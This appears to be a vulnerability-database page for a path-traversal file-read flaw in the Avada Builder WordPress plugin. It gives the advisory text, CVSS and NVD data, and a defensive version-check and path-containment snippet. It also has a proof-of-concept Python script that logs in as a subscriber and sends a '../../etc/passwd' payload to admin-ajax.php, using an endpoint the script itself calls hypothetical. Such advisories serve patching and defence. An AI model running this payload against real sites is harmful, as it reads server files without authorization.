Security Vulnerability Report
CVE-2026-4782 CVSS 6.5 MEDIUM

CVE-2026-4782

Published: 2026-05-13 13:01:56
Last Modified: 2026-05-13 14:43:47

Description

The Avada Builder plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 3.15.2 via the 'fusion_get_svg_from_file' function with the 'custom_svg' parameter of the 'fusion_section_separator' shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. The vulnerability was partially patched in version 3.15.2 and fully patched in version 3.15.3.
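Two checks a defender would want from the description above, written here as an added example rather than code from the plugin, Wordfence or NVD: a version gate that reads a WordPress plugin header and compares it against the first fully patched release (3.15.3), and a path-containment check of the kind that closes the CWE-36 pattern the record names (an attacker-controlled `custom_svg` value that escapes the intended directory). The plugin header text, the base directory and the sample paths are constructed for illustration; `resolve_within` is a generic mitigation, not the plugin's own `fusion_get_svg_from_file`.

```python
import re
from pathlib import Path
from typing import Optional, Tuple

# First release the advisory reports as fully patched.
FIXED_VERSION = (3, 15, 3)

# Constructed sample of a WordPress plugin file header (not a real file from the plugin).
SAMPLE_PLUGIN_HEADER = """<?php
/**
 * Plugin Name: Avada Builder
 * Version: 3.15.1
 */
"""


def parse_plugin_version(header_text: str) -> Tuple[int, ...]:
    """Extract the 'Version:' header WordPress reads from a plugin's main file."""
    match = re.search(r"^\s*\*?\s*Version:\s*([0-9][0-9.]*)", header_text, re.MULTILINE)
    if not match:
        raise ValueError("no Version: header found")
    return tuple(int(part) for part in match.group(1).split(".") if part)


def is_vulnerable(version: Tuple[int, ...]) -> bool:
    """True for every version below the fully patched release (covers <= 3.15.2)."""
    return version < FIXED_VERSION


def resolve_within(base_dir: str, user_path: str) -> Optional[str]:
    """Return the real path for user_path only if it stays inside base_dir and is an .svg.

    Joining an absolute user_path onto base replaces base entirely, and '..' segments are
    collapsed by resolve(), so the containment test below catches both absolute-path and
    traversal inputs (the two faces of CWE-36 style file reads).
    """
    base = Path(base_dir).resolve()
    candidate = (base / user_path).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return None  # escaped the allowed directory
    if candidate.suffix.lower() != ".svg":
        return None  # only the expected file type is served
    return str(candidate)


if __name__ == "__main__":
    version = parse_plugin_version(SAMPLE_PLUGIN_HEADER)
    print("installed:", ".".join(map(str, version)), "vulnerable:", is_vulnerable(version))
    for requested in ("sub/shape.svg", "../../etc/passwd", "/etc/passwd"):
        print(requested, "->", resolve_within("/var/www/uploads/fusion", requested))
```

The version gate is what a fleet-wide inventory script would run over every site's plugin directory; the containment check is the shape of fix to look for when confirming that an upgrade (or a vendor patch) actually closed the read, since a hotfix that only strips `../` still leaves absolute paths open.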

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Avada Builder <= 3.15.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit Title: WordPress Avada Builder < 3.15.3 - Arbitrary File Read (Subscriber)
# Description: Reads /etc/passwd using the vulnerable shortcode parameter.

target_url = "http://target-site.com"
login_url = f"{target_url}/wp-login.php"

# Attacker credentials (Subscriber level)
username = "attacker"
password = "password"

session = requests.Session()

# Step 1: Authenticate as a subscriber
login_data = {
    "log": username,
    "pwd": password,
    "redirect_to": f"{target_url}/wp-admin/",
    "wp-submit": "Log In",
}
session.post(login_url, data=login_data)

# Step 2: Send payload exploiting the shortcode
# Note: The exact endpoint to trigger the shortcode might vary (e.g., via AJAX or preview).
# This simulates sending a request that triggers the 'fusion_section_separator' rendering.
# The vulnerability is in 'fusion_get_svg_from_file' called by the shortcode.
vulnerable_file = "../../../../../../../etc/passwd"

# Example payload structure based on the function 'fusion_section_separator'
# Assuming an AJAX endpoint that renders shortcodes or accepts the parameter directly
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
payload_data = {
    "action": "fusion_builder_render",  # Hypothetical action for demonstration
    "shortcode": f"[fusion_section_separator custom_svg='{vulnerable_file}']",
    # Or direct parameter depending on implementation
    "custom_svg": vulnerable_file,
}

response = session.post(ajax_url, data=payload_data)

if "root:" in response.text:
    print(f"[+] Exploit successful! File content:\n{response.text}")
else:
    print("[-] Exploit failed or target not vulnerable.")
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4782",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T13:01:55.633",
    "lastModified": "2026-05-13T14:43:46.717",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Avada Builder plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 3.15.2 via the 'fusion_get_svg_from_file' function with the 'custom_svg' parameter of the 'fusion_section_separator' shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. The vulnerability was partially patched in version 3.15.2 and fully patched in version 3.15.3."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-36"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://themeforest.net/item/avada-responsive-multipurpose-theme/2833226",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/86346be9-7ca6-49b7-83b2-01a335d48c94?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```